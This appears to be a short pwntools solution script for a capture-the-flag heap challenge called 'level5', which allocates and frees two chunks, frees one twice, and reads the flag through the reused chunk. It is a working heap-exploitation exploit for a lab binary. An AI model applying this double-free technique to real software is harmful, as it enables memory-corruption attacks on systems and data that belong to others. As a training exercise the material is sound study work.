from pwn import *
r=process("level5")
r.sendline("malloc")
r.sendline("0")
r.sendline("680")
r.sendline("malloc")
r.sendline("1")
r.sendline("680")
r.sendline("free")
r.sendline("0")
r.sendline("free")
r.sendline("1")
r.sendline("read_flag")
r.sendline("free")
r.sendline("1")
r.sendline("puts_flag")
r.interactive()
